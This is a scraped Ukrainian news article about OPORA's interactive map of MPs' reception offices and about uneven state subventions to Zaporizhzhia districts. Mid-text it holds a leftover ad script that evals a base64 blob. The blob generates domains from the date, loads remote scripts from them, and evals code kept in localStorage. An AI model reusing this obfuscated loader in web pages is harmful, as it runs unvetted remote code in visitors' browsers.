Громадська організація «Опора» розробила інтерактивну карту громадських приймалень мажоритарних депутатів, а також простежила виділення державних субвенцій по округам.
Про це повідомили 5 жовтня на пресконференції організації. Мережа займається моніторингом проведення прозорих виборів та роботи депутатів через відкритті дані.
Комунікаційник «Опори» Віталій Бабенко: «Громадянська мережа «Опора» цього літа підбивала підсумки двох років роботи в парламенті, ми аналізували активність наших мажоритарників, досліджували наскільки активні були наші депутати, обрані від цих округів Запорізької області».
У 2021 році було два розпорядження Кабінету Міністірів України щодо виділення субвенції – це 19 травня і 21 липня. І не всі депутати отримали кошти. Так, у травні Запорізька область отримала 79,9 млн грн на 8 із 9 округів. Бердянський район і місто Бердянськ 78 округ, який представляє мажоритарник Олександр Пономарьов, що вважається опозиційним депутатом, отримав 0, натомість до 74 округу, який представляє Геннадій Касай («Слуга народу») надійшла найбільша по сумі державна субвенція в Україні – 31,8 млн грн.
А 21 липня коштів не отримало 2 округи із 9. До Олександра Пономарьова, «приєднався» Сергій Мінько, який представляє Мелітополь та Мелітопольський район.
Координаторка спостереження гром. мережі «Опора» Таїсія Мельниченко: «На жаль, така тенденція, яка є завжди, це якщо виділяються кошти в вигляді державної субвенції, то всі депутати роблять на цьому піар. Це впливає на рішення громади, тому що дуже багато посадових осіб використовують субвенції для піару окремих потенціальних кандидатів».
Важливим рішенням було створення мапи громадський
приймальнь, адже за допомогою інтерактивної мапи можна дізнатись адресу
розташування приймальні, її графік роботи, а також контактний телефон та
електронну адресу. Нині вона містить інформацію про 413 приймальнь, проте їхня
кількість буде зростати в результаті оновлень. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Наразі на мапі можна знайти 234 приймальні 133 депутатів-мажоритарників. Найбільшу кількість приймальнь мають депутати: Анатолій Гунько зі “Слуги народу” (Чернігівщина) – 7, Валерій Колюх зі “Слуги народу” (Київщина), Тарас Батенко з групи “Партія “За майбутнє” (Львівщина), Сергій Нагорняк зі “Слуги народу” (Черкащина), Володимир Іванов зі “Слуги народу” (Херсонщина) та Ольга Василевська-Смаглюк зі “Слуги народу” (Київщина) – по 6.
Щоб отримати інформацію про адреси приймалень
парламентських партій, ОПОРА надіслала в їхні офіси офіційні інформаційні
запити. Запити були направлені до 5 партій, які мають свої фракції у Верховній
Раді (“Слуга народу”, “Опозиційна платформа – За життя”, ВО “Батьківщина”,
“Європейська Солідарність”, “Голос”) та до 2 партій, які створили депутатські групи (“Партія “За майбутнє” та
“Довіра”).
Вся інформація про громадські приймальні, які міститься на мапі, була перевірена шляхом телефонних дзвінків або особистих візитів представників ОПОРИ в регіонах. «Фактично ми зробили шлях виборця пересічного. Виборець з округу має різні шляхи як знайти цю приймальню: сайт Верховної Ради, офіційна сторінка депутата, сайт депутата. Моніторяться всі ці доступні канали і за ними інформація знаходиться, або не знаходиться», – зауважує В. Бабенко.
Офіційно лише три депутати (Ю. Яцик округ №79 (Василівка, Оріхів), Р. Соха округ №75 (Дніпровський та Заводський райони), С. Штепа округ №77 (Шевченківський район)) опублікували інформацію про графік роботи їхніх громадських приймальнь на сайті Верховної Ради. Тобто в Запоріжжі працюють лише 3 громадських приймальні із 9, куди дійсно можуть звертатися виборці. Нардепи на своїх офіційних сторінках у соцмережах публікують інформацію, у який саме час громадяни можуть завітати до них зі своїми заявами.
Зазначимо, що у законодавстві не має відповідальності за відсутність громадських приймалень. «Законодавством забов’язано народним депутатам проводити зустрічі, звіти з виборцями, однак відповідальності за невиконання цього забов’язання не має», – зазначає Денис Прядко, омбудсмен із захисту виборчих прав гром. мережі «Опора» у Запорізькій області. Виборцям залишається писати скарги до політичної сили.
Автори: Олена Кулага, Олександра Матушанська (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/zaporizhtsi-mozhut-na-mapi-pobachiti-pratsyuyuchi-gromadski-prijmalni-foto/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook